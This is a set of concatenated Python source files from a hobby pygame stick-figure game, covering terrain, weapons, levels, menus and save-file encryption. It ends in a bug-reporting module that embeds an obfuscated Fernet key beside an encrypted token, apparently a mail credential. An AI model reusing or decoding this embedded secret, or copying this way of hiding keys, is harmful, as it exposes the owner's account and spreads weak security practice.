except IndexError:
# no alpha has been set
print('no alpha set')
for line, index1 in zip(text, range(len(text))):
for block, index2 in zip(line, range(len(line))):
# print(block)
if block == self.ground_symbol:
big_actual_picture.blit(
self.image1, (index2 * self.size, index1 * self.size))
elif block == self.surface_symbol:
big_actual_picture.blit(
air_picture, (index2 * self.size, index1 * self.size))
big_actual_picture.blit(
self.image2, (index2 * self.size, index1 * self.size))
elif block == self.air_symbol:
big_actual_picture.blit(
air_picture, (index2 * self.size, index1 * self.size))
elif block == self.water_symbol:
big_actual_picture.blit(
water_picture,
(index2 * self.size, index1 * self.size))
elif block == self.pit_symbol:
big_actual_picture.blit(
air_picture, (index2 * self.size, index1 * self.size))
big_actual_picture.blit(
pit_picture, (index2 * self.size, index1 * self.size))
elif block == self.top_water_symbol:
big_actual_picture.blit(
air_picture, (index2 * self.size, index1 * self.size))
big_actual_picture.blit(
top_water_picture,
(index2 * self.size, index1 * self.size))
elif block == self.sign_symbol:
big_actual_picture.blit(
air_picture, (index2 * self.size, index1 * self.size))
big_actual_picture.blit(
sign_picture,
# sign is 30x30 pixels
(index2 * self.size - 20, index1 * self.size - 17))
self.built_image = big_actual_picture
scale(big_actual_picture, (800, 400))
return big_actual_picture
def save(self, filename):
if not self.use_numpy:
raise SMRError('numpy is not in use, no files can be saved')
self.terrain2dlist_texts[self.template].dump(filename)
@classmethod
def save_all(cls, directory):
if not os.path.exists(directory):
os.mkdir(directory)
for file in cls.terrain2dlist_texts:
cls.terrain2dlist_texts[file]['text'].dump(os.path.join(directory, file + '.bin'))
def get_last_unsolid(self, x):
"""get the index of the bottommost air or water block."""
arr = list(self.terrain2dlist_texts[self.template]['text'][:, x - 1])
arr.reverse()
not_solid = ['+', '-', '~']
indices = [arr.index(i) if i in arr else 0 for i in not_solid]
bottom = len(arr) - min(filter(None, indices)) - 1
return bottom
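# worked example: a column reading ['~', '~', '*', '#', '#'] top to bottom is
# reversed to ['#', '#', '*', '~', '~']; the lowest non-solid symbol '~' sits at
# reversed index 3, so bottom = 5 - 3 - 1 = 1, the row of the bottommost air block.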
def blocks_to_px(self, blocks):
"""convert the blocks to pixels."""
return round(blocks * self.terrain2dlist_texts[self.template]['size'])
def is_on_solid(self, x, y, size_of_obj):
""" return true if the object is on solid ground. if it is not, return false."""
arr = self.terrain2dlist_texts[self.template]['text'][:, x]
bottom = y + size_of_obj
print(bottom)
bottom_blocks = self.px_to_blocks(bottom)
print(self.px_to_blocks(x), bottom_blocks)
return self.get_solid((self.px_to_blocks(x), bottom_blocks))
def get_spawn_point(self, x, size_of_obj):
"""get a proper spawn point on Y axis for object."""
blk_size = self.terrain2dlist_texts[self.template]['size']
last_unsolid = self.blocks_to_px(self.get_last_unsolid(self.px_to_blocks(x)))
first_solid = last_unsolid + blk_size
return first_solid - size_of_obj
def px_to_blocks(self, pixels):
"""convert blocks to pixels"""
return round(pixels / self.terrain2dlist_texts[self.template]['size'])
def is_in_air(pos, terrain, size):
"""return true if the position is in air. if not, return false."""
array = terrain.terrain2dlist_texts[terrain.template]['text']
x, y = pos
y += size
try:
column = array[:, terrain.px_to_blocks(x)]
except IndexError:
return False
block = column[terrain.px_to_blocks(y)]
return terrain.is_air(block)
def is_underground(pos, terrain, size):
"""return true if any part of the object is underground."""
array = terrain.terrain2dlist_texts[terrain.template]['text']
x, y = pos
y += size
print(array, 'howdy ho')
column = array[:, terrain.px_to_blocks(x)]
block = column[terrain.px_to_blocks(y)]
return terrain.is_solid(block)
def _change_colour_surface(surface, r, g, b):
"""changes the colour of all parts of a
surface except for the transparent parts.
"""
arr = pg.surfarray.pixels3d(surface)
arr[:, :, 0] = r
arr[:, :, 1] = g
arr[:, :, 2] = b
def saveall():
Terrain('dirt').save_all('binaries')
def main2():
t = Terrain('dirt', 'drop')
t.load_text()
print(t.terrain2dlist_texts[t.template]['text'][:, 1])
t.build_surface()
pg.image.save(t.built_image, "C:\\Users\\Micha\\OneDrive\\Desktop\\hi.png")
print(is_in_air((100, 315), t, 5))
if __name__ == '__main__':
main2()
"""
this class is the base class
for all things like enemies, and characters.
"""
import pygame as pg
import threading
class IDontKnowWhatToCallItYet:
def start_thread(self, **kwargs):
self.mainthread = threading.Thread(
target=self.mainloop, daemon=True, **kwargs)
self.mainthread.start()
def mainloop(self):
pass
# this needs to be figured out yet.
# i figure i can do that when i get more
# of the workings figured out
def kill_thread(self):
pass  # TODO: signal self.mainthread to stop; not implemented yet
import os
import pygame
try:
from _internal import *
except ImportError:
from ._internal import *
__all__ = ['Weapon']
class Weapon:
cooldown = 0
def __init__(self, klass, name, colour, level, attack, range, alphatocolour=None):
self.largeicon = PICS['weapons']['large_icon'][klass][repr(level)][
colour]
self.smallicon = PICS['weapons']['small_icon'][klass][repr(level)][
colour]
if alphatocolour is not None:
change_alpha_to_colour(self.largeicon, alphatocolour)
change_alpha_to_colour(self.smallicon, alphatocolour)
self.name = name
self.colour = colour
self.range = range
self.attack = attack
rect = self.largeicon.get_rect()
pos = rect.bottomright[0] - 4, rect.bottomright[1] - 9
font = pygame.font.Font('freesansbold.ttf', 8)
print(font.size('8'))
surf = font.render(repr(level), True, COLOURS['black'])
self.largeicon.blit(surf, pos)
def can_attack(self):
"""return true if the weapon is able to attack."""
return self.cooldown == 0
def update(self):
if self.cooldown != 0: self.cooldown -= 1
def attack_enemy(self, target):
self.cooldown = self.attack.cooldown
target.hit(self.attack)
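# rough per-frame usage sketch (the enemy object and range test are assumed here,
# they are not part of this module):
#   weapon.update()                        # ticks the cooldown down by one
#   if weapon.can_attack() and enemy_in_range:
#       weapon.attack_enemy(enemy)         # applies self.attack and restarts the cooldown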
if __name__ == '__main__':
pygame.init()
a = pygame.display.set_mode((1000, 1000))
a.fill(COLOURS['blue'])
a.blit(
# demo call; the name, attack and range arguments here are placeholders just
# so the icon renders (real values live in database.DEFAULT_WEAPONS)
Weapon('sword', 'Sword', 'grey', 1, None, 7, {
100: COLOURS['dark brown'],
150: COLOURS['brown']
}).largeicon, (0, 0))
while 1:
for ev in pygame.event.get():
if ev.type == 12:
raise SystemExit
pygame.display.update()
"""
_internal.py - a VERY messy module that i
kind of hate myself for making, but a lot of my
files in the class_ library rely on it
(if i could remove it, I would) :(
"""
from pprint import pprint
import os
import sys
import pygame as pg
from pygame.locals import *
import random
CHANGE_COLOUR_DIRS = ('characters_parts',
'heads',
'attacks',
'sword',
'bow',
'knife',
'spear',
'wand',
)
# print(sys.executable, 'HOWDY HO')
pg.init()
BACKWARDS = 'backwards'
FORWARDS = 'forwards'
DIR = '..\\' if os.getcwd().endswith('class_') else ''
__author__ = 'NOT Michael Gill'
__version__ = '0.0'
VALID_ENEMY_HEADS = ['smile', 'frown', 'triangle']
COLOURS = {
'brown': (101, 67, 33),
'dark brown': (210, 105, 30),
'azure': (0, 127, 255),
'light azure': (135, 206, 235),
'light beige': (225, 198, 153),
'beige': (232, 202, 145),
'green': (0, 128, 0),
'blue': (0, 0, 128),
'light green': (109, 227, 59),
'light blue': (173, 216, 230),
'light red': (250, 128, 114),
'red': (128, 0, 0),
'dark red': (255, 0, 0),
'dark blue': (0, 0, 255),
'dark green': (0, 255, 0),
'black': (0, 0, 0),
'light black': (211, 211,
211), # names like this are stupid, but must be used
'aqua': (0, 255, 255),
'white': (255, 255, 255),
'teal': (0, 128, 128),
'purple': (128, 128, 0),
'light purple': (177, 156, 217),
'light yellow': (255, 255, 224),
'light cyan': (224, 255, 255),
'light grey': (211, 211, 211),
'dark purple': (255, 255, 0),
'yellow': (255, 255, 0),
'silver': (192, 192, 192),
'gold': (192, 192, 96),
'grey': (211, 211, 211),
'cyan': (175, 238, 238),
}
COLOURS['gray'] = COLOURS['grey']
COLOURS['light gray'] = COLOURS['light grey']
COLOURS['light gronce'] = COLOURS['light grey'] # for Zeodexic
COLOURS['gronce'] = COLOURS['grey']
def _gather_pics(dir='.'):
dictionary = {}
enddir = os.path.split(dir)[-1]
for item in os.listdir(dir):
if '.' in item:
pname, extension = [x.lower() for x in item.split('.')]
fname = os.path.join(dir, item)
if os.path.isdir(os.path.join(dir, item)):
dictionary[item] = _gather_pics(fname)
elif extension in ('png', 'jpg'):
dictionary[pname] = pg.image.load(fname)
if enddir in CHANGE_COLOUR_DIRS:
# heads, attacks, and weapons should be of each colour
# print(dir)
di = dictionary[pname] = {}
for col in COLOURS:
# print(dir, col)
rgb_col = COLOURS[col]
di[col] = pg.image.load(os.path.join(dir, item))
change_colour_surface(di[col], *rgb_col)
return dictionary
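# rough shape of the dictionary this builds (sketch only; the real keys depend
# on what sits under data/): ordinary folders become nested dicts of Surfaces, e.g.
#   PICS['characters']['swordsman']   -> pygame.Surface
# while images inside folders listed in CHANGE_COLOUR_DIRS become one recoloured
# Surface per COLOURS entry, e.g.
#   PICS['heads']['smile']['red']     -> pygame.Surface tinted (128, 0, 0)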
def change_colour_surface(surface, r, g, b):
"""changes the colour of all parts of a
surface except for the transparent parts.
"""
arr = pg.surfarray.pixels3d(surface)
arr[:, :, 0] = r
arr[:, :, 1] = g
arr[:, :, 2] = b
# def change_alpha_to_colour(surface, colour):
# """changes all the alpha values in surface
# to colour.
# """
# alpha = pg.surfarray.pixels_alpha(surface)
# for line in alpha:
# for index in range(len(alpha)):
# if line[index] != 0:
# line[index] =
PICS = _gather_pics(os.path.join(DIR, 'data'))
# print(DIR)
TDIR = os.path.join(DIR, 'terrains')
"""characters.py- a module of subclasses
each of these classes is a class of stickman from
stickmanranger.
"""
DEFAULT_STATS = (50, 0, 0, 0, 0)
def change_alpha_to_colour(surf, alpha_to_colour):
# print(alpha_to_colour)
for alpha_value, colour in zip(alpha_to_colour.keys(),
alpha_to_colour.values()):
alpha = pg.surfarray.pixels_alpha(surf)
colours = pg.surfarray.pixels3d(surf)
# print(alpha)
for i, index1 in zip(alpha, range(len(alpha))):
for val, index in zip(i, range(len(i))):
if val == alpha_value:
colours[index1][index] = colour
alpha[index1][index] = 255
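# example mapping (the same shape weapon.py passes in, icon being any
# per-pixel-alpha Surface): pixels whose alpha is exactly 100 become dark brown,
# pixels whose alpha is exactly 150 become brown, and both are made fully opaque:
#   change_alpha_to_colour(icon, {100: COLOURS['dark brown'], 150: COLOURS['brown']})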
def _Box(size, colour, pos, surface, alpha=None, image=None) -> tuple:
"""
return a square rectangle, surface pair
uses MyRect
"""
# print(pos)
new_surf = pg.surface.Surface(size)
new_surf.fill(colour)
if alpha is not None:
new_surf.set_alpha(alpha)
surface.blit(new_surf, pos)
if image is not None:
surface.blit(image, pos)
return MyRect(new_surf.get_rect(topleft=pos)), new_surf
# pprint(PICS)
"""
__init__.py- this is the only module that will
be loaded on calling 'import class_', so i thought
it would be good to bundle everything in here.
it is expected that this will only be called
from .., so this should be fine
"""
try:
from .screen import Screen, PeacefulScreen
from .backgroundimage import BackGroundImage
from .stage import Stage
from .inventory import InventoryHandler
from .enemy_head import EnemyHead
from .my_rect import MyRect
from .smr_error import SMRError
from .terrain import Terrain
from .weapon import *
from .characters import *
from .enemies import *
from .attack import Attack
import class_.enemies
import class_.klass
except SystemError:
from attack import Attack
from inventory import InventoryHandler
from screen import Screen, PeacefulScreen
from backgroundimage import BackGroundImage
from stage import Stage
from enemy_head import EnemyHead
from my_rect import MyRect
from smr_error import SMRError
from terrain import Terrain
from weapon import *
from characters import *
from enemies import *
import enemies
import klass
import json as _json
import os
import enum
import pygame as _pg
_pg.mixer.pre_init(44100, 16, 2, 4096)
_pg.init()
import save
import levelparser
import class_ as _class_
from class_.sprite import SMRSprite as SpriteUtils
_pg.display.set_caption("Stickman's New World")
_pg.display.set_icon(_pg.image.load(os.path.join('data', 'game_icon.png')))
_pg.mouse.set_visible(False)
SURFACE = _pg.display.set_mode((800, 600))
ALL_LEVELS = levelparser.get_levels(SURFACE)
_HOME = os.getenv('USERPROFILE') or os.getenv("HOME")
SAVE_DIR = os.path.join(_HOME, '.stickman_new_world')
class Area(enum.Enum):
"""area of the game currently."""
TITLE = 0
MAP = 1
STAGE = 2
PAUSE = 3
# dictionary of color strings containing RGB values
COLOURS = {
'brown': (101, 67, 33),
'dark brown': (210, 105, 30),
'azure': (0, 127, 255),
'light azure': (135, 206, 235),
'light beige': (225, 198, 153),
'beige': (232, 202, 145),
'green': (0, 128, 0),
'blue': (0, 0, 128),
'light green': (109, 227, 59),
'light blue': (173, 216, 230),
'light red': (250, 128, 114),
'red': (128, 0, 0),
'dark red': (255, 0, 0),
'dark blue': (0, 0, 255),
'dark green': (0, 255, 0),
'black': (0, 0, 0),
'light black': (211, 211,
211), # names like this are stupid, but must be used
'aqua': (0, 255, 255),
'white': (255, 255, 255),
'teal': (0, 128, 128),
'purple': (128, 128, 0),
'light purple': (177, 156, 217),
'light yellow': (255, 255, 224),
'light cyan': (224, 255, 255),
'light grey': (211, 211, 211),
'dark purple': (255, 255, 0),
'yellow': (255, 255, 0),
'silver': (192, 192, 192),
'gold': (192, 192, 96),
'grey': (211, 211, 211),
'cyan': (175, 238, 238),
}
#open = lambda file: __builtins__.open(os.path.join('config', file))
_DECODE = _json.JSONDecoder()
SETTINGS = _DECODE.decode(open(os.path.join('config', 'settings.json')).read())
ALL = _DECODE.decode(open(os.path.join('config', 'data.json')).read())
ALL_CLASSES = ['Swordsman', 'Spearman', 'Wizard', 'Archer', 'Angel']
# print(ALL)
ALL_TERRAINS = [
_class_.Terrain('dirt', 'flat'),
]
ALL_SCREENS = []
ALL_WEAPONS = []
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# "remember to add a 'Spicy Shot' magic book later." (Alvin Gu, Oct 26, 2018) #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
DEFAULT_WEAPONS = {
'angel': _class_.Weapon('knife', 'Knife', 'black', 1, _class_.Attack(4, 20), 3),
'swordsman': _class_.Weapon('sword', 'Sword', 'gray', 1, _class_.Attack(7, 60), 7),
'spearman': _class_.Weapon('spear', 'Spear', 'gray', 1, _class_.Attack(5, 50), 12),
'archer': _class_.Weapon('bow', 'Bow', 'brown', 1, _class_.Attack(3, 30), 130),
'wizard': _class_.Weapon('wand', "Beginner's Spellbook", 'blue', 1, _class_.Attack(15, 120), 70),
}
ALL_COMPOS = []
import picture_collect
PICS = picture_collect.gather_pics('data')
if os.path.exists(SAVE_DIR):
_SAVE = save.read_file()
print(_SAVE)
_INV_RAW = _SAVE['inventory']
x, y = max([int(i.split('x')[0]) for i in _INV_RAW]), max(
[int(i.split('x')[1]) for i in _INV_RAW])
_INV = _class_.InventoryHandler(x, y)
_INV.sort_dict(_INV_RAW)
MAIN_GAME_STATE = {
'AREA': 0,
'TERMINAL': None,
'SETTINGS': SETTINGS,
'GAME_DATA': _SAVE,
'INVENTORY': _INV,
'MAIN_DISPLAY_SURF': SURFACE,
'CURSOR': PICS['cursor'],
}
else:
MAIN_GAME_STATE = {
'AREA': 0,
'TERMINAL': None,
'SETTINGS': SETTINGS,
'GAME_DATA': {},
'INVENTORY': {},
'MAIN_DISPLAY_SURF': SURFACE,
'CURSOR': PICS['cursor'],
}
"""
encrypt.py- encrypter for stickmanranger save files.
I want people to be able to mod this game, but I don't
necessarily want people to be able to change it up
super easily!"""
from cryptography.fernet import Fernet
from itertools import count
import os
import shutil
import time
if not os.name == 'nt':
os.getlogin = lambda: __import__('pwd').getpwuid(os.getuid())[0]
CURRENT_TIME = time.asctime()
PATH = {
'nt': 'C:\\Users\\{}\\.stickman_new_world\\save\\'.format(os.getlogin()),
'posix': '/home/{}/.stickman_new_world/save/'.format(os.getlogin()),
}[os.name]
PATH_NUMERIC = os.path.join(PATH, '%s') + ('\\' if os.name == 'nt' else '/')
print(PATH_NUMERIC)
if not os.path.exists(PATH):
os.makedirs(PATH)
FILE = PATH + '.smr-save'
print(FILE)
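# on-disk layout produced by the functions below (everything lives in PATH):
#   .smr-save   - the Fernet-encrypted save data
#   time        - the asctime() timestamp of the last save
#   <key>       - an empty file whose *name* is the Fernet key for .smr-save;
#                 encrypt() deletes any previous key file before writing a new one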
def encrypt(string):
if not os.path.exists(PATH):
os.makedirs(PATH)
prev_key = os.listdir(PATH)
for f in prev_key:
if not f in ('.smr-save', 'time'):
os.remove(PATH + f)
prev_dir = 0
for number in count():
if os.path.exists(PATH_NUMERIC % number):
prev_dir = number
else:
# the system can't find this file, but it will only
# be the first one it doesnt find.
prev_dir = number
break
def_path = PATH
# os.mkdir(def_path)
key = Fernet.generate_key()
# simply make a file with that name
with open(def_path + key.decode(), 'w'):
pass
encrypter = Fernet(key)
cipher = encrypter.encrypt(string.encode())
with open(FILE, 'wb') as cipher_file:
cipher_file.write(cipher)
with open((os.path.join(def_path, 'time')), 'w') as time_file:
time_file.write(CURRENT_TIME)
return cipher
def decrypt(spec=None):
prev_dir = spec
if spec is None:
prev_dir = 0
for number in count():
if os.path.exists(PATH_NUMERIC % number):
prev_dir = number
else:
# the system can't find this file, but it will only
# be the first one it doesnt find.
break
data = open(FILE, 'rb').read()
key = os.listdir(PATH)
key.pop(key.index('.smr-save'))
key.pop(key.index('time'))
key = key[0].encode()
encrypter = Fernet(key)
text = encrypter.decrypt(data).decode()
saved_time = open(os.path.join(PATH, 'time')).read()
return text, saved_time
if __name__ == '__main__':
time = __import__('time').asctime()
print(encrypt(open('misc\\shello.ini').read()))
print(decrypt()[0], decrypt()[1], sep='\n\n\n')
"""gameplay.py- main gameplay file.
handle all events in this file, display terrain, handle deaths,
status effects, etc...
"""
from pygame.locals import QUIT, MOUSEBUTTONDOWN
import pygame as pg
from database import MAIN_GAME_STATE, PICS, ALL_LEVELS, Area
SURFACE = MAIN_GAME_STATE['MAIN_DISPLAY_SURF']
PLAY_AREA = pg.Rect((0, 0), (800, 400))
MENU_AREA = pg.Rect((0, 400), (800, 200))
CLOCK = pg.time.Clock()
FPS = 60
def main():
"""run the game, after the title screen."""
continue_ = True
menu = pg.Surface((800, 200))
menu.fill((0, 255, 0))
MAIN_GAME_STATE['MOUSEDOWN'] = False
while continue_:
MAIN_GAME_STATE['MOUSE_POS'] = pg.mouse.get_pos()
events = [event for event in pg.event.get()]
if MAIN_GAME_STATE['AREA'] == Area.MAP:
draw_map()
handle_map()
elif MAIN_GAME_STATE['AREA'] == Area.STAGE:
MAIN_GAME_STATE['STAGE'].update(events)
MAIN_GAME_STATE['MAIN_DISPLAY_SURF'].blit(MAIN_GAME_STATE['CURSOR'], pg.mouse.get_pos())
# MAIN_GAME_STATE['MAIN_DISPLAY_SURF'].blit(menu, (0, 400))
pg.display.update()
CLOCK.tick(FPS)
def draw_map():
"""draw the map to the screen, and all stages."""
SURFACE.blit(PICS['Maps']['complete'], (0, 0))
for stage in ALL_LEVELS:
stage.draw_on_map()
def handle_map():
pos = pg.mouse.get_pos()
print(pos)
for stage in ALL_LEVELS:
stage.check_hover(pos)
for event in pg.event.get():
check_quit(event)
if event.type == MOUSEBUTTONDOWN and stage.rect.collidepoint(*event.pos):
stage.init(MAIN_GAME_STATE)
MAIN_GAME_STATE['STAGE'] = stage
MAIN_GAME_STATE['AREA'] = Area.STAGE
def check_quit(event):
"""check if event is a quit event. if it is, quit."""
if event.type == QUIT:
pg.quit()
raise SystemExit
print("Hello")
with open('file.txt', 'w') as openfile:
openfile.write('Hello')
import threading
import tkinter.messagebox
threading.Thread(
target=lambda: tkinter.messagebox.showinfo('hi', 'hi')).start()
from queue import Queue
Q = Queue()
def p():
print(Q.get())
t = threading.Thread(target=p)
t.start()
while True:
Q.put(input('type to send a message to t: '))
"""levelparser: converts a JSON level into a Stage object."""
import json
import pygame
import class_
def get_levels(mainsurf):
"""parse and return all levels in levels.json."""
levels = json.load(open("levels.json"))
print(levels.keys(), levels.values())
stages = []
for name, items in zip(levels, levels.values()):
screens = []
for obj in items['screens']:
enemies = {}
for enemy in obj['enemies']:
enemy_obj = getattr(class_, enemy['type'])(
enemy['colour'],
class_.EnemyHead(*enemy['head']),
enemy['drops'],
enemy['droprates'],
class_.Attack(*enemy['attack']),
enemy['health'],
enemy['range'],
enemy['size'],
)
enemies[enemy_obj] = enemy['amount']
screens.append(class_.Screen(enemies))
print(json.dumps(items, indent=4))
stage = class_.Stage(
name,
position_on_map=tuple(items['position']),
all_screens=screens,
boss_screen=items['boss_screen'],
surface=mainsurf,
terrain=class_.Terrain(
items['terrain']['texture'], items['terrain']['template']),
comes_from=items['comes_from'],
)
stages.append(stage)
return stages
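# illustrative levels.json entry, inferred from the keys read above (the enemy
# class name and head arguments here are made up; real files may carry more):
#
# {
#   "Test Stage 0.0": {
#     "position": [18, 569],
#     "boss_screen": null,
#     "comes_from": null,
#     "terrain": {"texture": "dirt", "template": "flat"},
#     "screens": [
#       {"enemies": [
#         {"type": "Smiley", "colour": "green", "head": ["smile", "green"],
#          "drops": [], "droprates": [], "attack": [4, 20], "health": 30,
#          "range": 5, "size": 10, "amount": 3}
#       ]}
#     ]
#   }
# }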
# hi
get_levels(pygame.Surface((1, 1)))
#!/usr/bin/python3
# main.py
"""
the main code for the game stickman ranger, a game similar to stick ranger(www.dan-ball.jp/en/javagame/ranger)
the goal is to defeat bosses and not get killed.
project started: oct. 20, 2017.
first level release goal: march 1, 2018
source code by Michael Gill
original SR by Ha55ii
this game is built on pygame, an excellent game engine for python
thanks to paint.net, which I made the sprites on.
UPDATE: May 18
Oh my goodness i look back at this code after so long of ignoring main.py
i kind of hate this module now.
oh well, it works, i suppose. for now
By the way, i wasnt even close to my intended release date :)
"""
__author__ = 'Michael Gill'
__version__ = '0.0'
__all__ = ['draw_box', 'draw_text', 'terminate', 'main']
import sys
import time
from pygame.locals import QUIT, MOUSEBUTTONDOWN, MOUSEBUTTONUP, MOUSEMOTION
import pygame as pg
# local imports
#import save
import database
import class_
import dicts
from dicts import COLOURS
import check_update
### constant values ###
##### IMPORTANT! REMEMBER CARTESIAN SYSTEM! ######
##### 0 FOR BOTH COORDINATES START IN TOP LEFT ###
NUM_OF_CHARS = 4
# window size (assumed 800x600 to match the display created in database.py)
WIN_X, WIN_Y = 800, 600
###functionality begins here! (YAY! FINALLY)###
def main():
"""
main functionality begins here
"""
check_update.main()
global CLOCK, SURFACE, PICS
flag = True
# for stopping the game loop when clicked, stop clutter.
pg.init()
PICS = dicts.gather_pics('data')
print(PICS)
SURFACE = database.SURFACE
CLOCK = pg.time.Clock()
pg.display.set_caption('StickMan Ranger')
pg.display.set_icon(PICS['game_icon'])
SURFACE.blit(PICS['Title_Screen'], (0, 0))
while flag: # main loop:
for ev in pg.event.get():
if ev.type == QUIT:
terminate()
elif ev.type == MOUSEBUTTONDOWN:
cho = choose_game_mode()
flag = False
pg.display.update()
print('main event loop terminated')
# print functions in this code are for debugging purposes only
if cho == 0:
char_list = get_keys_from_pics(get_characters())
clear_screen()
char_string = '\n'.join(char_list)
draw_text(char_string, size=45)
SURFACE.blit(PICS['Maps']['half_complete'], (0, 0))
while True:
for event in pg.event.get():
if event.type == QUIT:
terminate()
pg.display.update()
def choose_game_mode() -> int:
"""
choose which option the player wants
return 1 if player chooses new game
return 2 if player chooses load game
return 3 if player chooses load a backup.
"""
print('choose_game_mode called')
SURFACE.fill(COLOURS['white'])
# I realize now that I should have used a function for the three sections
# below, but whatever.
LabelPlay = pg.font.Font('data\\Michael`s Font.ttf', 32)
PlaySurf = LabelPlay.render('New Game', True, COLOURS['black'],
COLOURS['white'])
PlayRect = class_.MyRect(PlaySurf.get_rect())
PlayRect.center = ((WIN_X // 2), (WIN_Y // 2) - 50)
SURFACE.blit(PlaySurf, PlayRect)
#################################################################
LabelLoad = pg.font.Font('data\\Michael`s Font.ttf', 32)
LoadSurf = LabelLoad.render('Load Game', True, COLOURS['black'],
COLOURS['white'])
LoadRect = class_.MyRect(LoadSurf.get_rect())
LoadRect.center = (WIN_X // 2, WIN_Y // 2)
SURFACE.blit(LoadSurf, LoadRect)
#################################################################
LabelLoadEarlier = pg.font.Font('data\\Michael`s Font.ttf', 32)
LESurf = LabelLoadEarlier.render('Load Earlier Save', True,
COLOURS['black'], COLOURS['white'])
LERect = class_.MyRect(LESurf.get_rect())
LERect.center = (WIN_X // 2, WIN_Y // 2 + 50)
SURFACE.blit(LESurf, LERect)
while True:
for event in pg.event.get():
if event.type == QUIT:
terminate()
elif event.type == MOUSEMOTION:
x, y = event.pos
for (rect, surf) in ((PlayRect, PlaySurf),
(LoadRect, LoadSurf), (LERect, LESurf)):
rect.handle(event, SURFACE, surf)
elif event.type == MOUSEBUTTONDOWN:
x, y = event.pos
if PlayRect.collidepoint(x, y):
print("PlayRect Clicked")
return 0 # these return value, and end loop
elif LoadRect.collidepoint(x, y):
print("LoadRect Called")
return 1
elif LERect.collidepoint(x, y):
print("LERect called")
return 2
pg.display.update()
def draw_text(
text,
size=32,
cen_of_txt=(WIN_X // 2, WIN_Y // 2),
colour=(COLOURS['black'], COLOURS['white']),
) -> tuple:
"""
function for drawing text on SURFACE,
returns a tuple containing the rect
of the surface, and the surface
itself.
"""
FontObj = pg.font.Font('data\\Michael`s Font.ttf', size)
FontSurf = FontObj.render(text, True, *colour)
Rect = FontSurf.get_rect()
Rect.center = cen_of_txt
SURFACE.blit(FontSurf, Rect)
return class_.MyRect(Rect, colour=COLOURS['white']), FontSurf
def draw_box(size, colour, pos, alpha=None, image=None) -> tuple:
"""
return a square rectangle, surface pair
uses MyRect
"""
print(pos)
new_surf = pg.surface.Surface(size)
new_surf.fill(colour)
if alpha is not None:
new_surf.set_alpha(alpha)
SURFACE.blit(new_surf, pos)
if image is not None:
SURFACE.blit(image, pos)
return class_.MyRect(
new_surf.get_rect(topleft=pos), colour=colour), new_surf
def terminate():
"end the current pygame program"
# need to save the game... put some function call
pg.quit()
sys.exit()
def get_characters() -> list:
"""
starts a new game,
and lets the player choose
their characters.
returns a list of the characters
the player has chosen.
"""
SURFACE.fill(COLOURS['white'])
draw_text(
'Choose your players:', cen_of_txt=(WIN_X // 2, WIN_Y // 2 - 200))
texts = {}
pairs = []
num = -250 # this is the starting point for the images to appear
# puts all the characters in a line with their caption beneath
for string in database.ALL_CLASSES:
string = string.lower()
texts[string] = draw_text(
string, size=20, cen_of_txt=(WIN_X // 2 + num, WIN_Y // 2 + 200))
pic = PICS['characters'][string]
SURFACE.blit(pic, (texts[string][0].x + 20, texts[string][0].y + 30))
pairs.append((string, class_.MyRect(pic.get_rect())))
num += 100
del num, string
box_list = []
# this loop puts 4 boxes to show which characters the user has chosen
for i in range(WIN_X // 4, WIN_X // 4 * 3, 100):
box_list.append((draw_box(
(25, 25), COLOURS['gray'], (i, WIN_Y // 2), alpha=200),
(i, WIN_Y // 2))[0][0])
del i
print('pairs: ', *pairs, sep='\n')
char_list = []
clicked = 0
boxes_with_pictures = []
box_num_pairs = {
1: box_list[0],
2: box_list[1],
3: box_list[2],
4: box_list[3],
}
for key in box_num_pairs:
print('key: ', key, ' box: ', box_num_pairs[key], sep='')
while True:
for event in pg.event.get():
if event.type == QUIT:
terminate()
elif event.type == MOUSEMOTION:
for key in texts:
M = texts[key]
M[0].handle(event, SURFACE, M[1])
# this branch controls when a selection box is
# selected, which one to underline.
elif event.type == MOUSEBUTTONDOWN: # if mouse is clicked
x, y = event.pos
for key, rect in zip(box_num_pairs.keys(),
box_num_pairs.values()):
print(rect is box_num_pairs[key])
if rect.collidepoint(x, y):
# if click is in 'rect'
if not rect.underlined:
# only do this is 'rect' is underlined
rect.underline(SURFACE)
if clicked == key:
box_num_pairs[clicked].remove_underline(SURFACE)
clicked = 0
elif clicked == 0:
clicked = key
else:
box_num_pairs[clicked].remove_underline(SURFACE)
clicked = key
for rect_key, rect in zip(box_num_pairs.keys(),
box_num_pairs.values()):
for character_name, rect_surf_pair in zip(
texts.keys(), texts.values()):
if rect_surf_pair[0].collidepoint(x, y):
print('garpenchank')
try:
box_num_pairs[clicked].draw_inside(
PICS['characters'][character_name],
SURFACE)
boxes_with_pictures.append(clicked)
except (class_.SMRError, KeyError) as error:
print(error)
break
elif clicked in boxes_with_pictures:
print('gud')
box_num_pairs[clicked].remove_pic(SURFACE)
char_list = [
box.PicInside for box in box_num_pairs.values()
]
pg.display.update()
if not None in char_list[:2]:
print('howdy')
char_list = [box.PicInside for box in box_num_pairs.values()]
if not None in char_list:
return char_list
def clear_box(pos):
"""
clears the box that needs to be cleared.
"""
print('in the function clear_box')
draw_box((25, 25), COLOURS['white'], pos)
draw_box((25, 25), COLOURS['gray'], pos, alpha=100)
def change_colour_surface(surface, r, g, b):
"""changes the colour of all parts of a
surface except for the transparent parts.
"""
arr = pg.surfarray.pixels3d(surface)
arr[:, :, 0] = r
arr[:, :, 1] = g
arr[:, :, 2] = b
def get_keys_from_pics(orig_list):
"""
returns a dict that has keys of the original
dict that the pics were contained in. for example:
get_keys_from_pics(gladiator_pic)
will return:
{'gladiator': <class 'pygame.Surface' object>}
note: if an item doesnt match, for example a
string, or a picture not in data/characters,
nothing will be done with it.
"""
pics_dict = PICS['characters']
new_dict = {}
for key, value in zip(pics_dict.keys(), pics_dict.values()):
for picture in orig_list:
if picture == value:
new_dict[key] = value
return new_dict
def clear_screen():
return SURFACE.fill(COLOURS['white'])
if __name__ == '__main__':
main()
else:
print('why on earth are you importing this?\n\
it is supposed to be a main module!')
"""menu.py- handle the menu at the bottom of the screen."""
"""
bugreport.py
this module takes any exception, the app name,
and any other info, and reports it to my email.
"""
import io
import os
import smtplib
from cryptography.fernet import Fernet
import sys
import threading
import traceback
import platform
FYUKYFVKFYVHUFL = b'gAAAAABavaf20Qc-jiOnPXzOsBfr-yhJiVbuBEiyK4cJA3r82f0wXAp5gdgPQ43UxZB7H9O9RgiTCHDb0ngh9CNCRPi03nQssg=='
HIUEFWILEIURFHE = b'_qJoI0kXZlQuHI0-U8BSSKuKQ_Zpp3vQMZGrPKMk8lI='
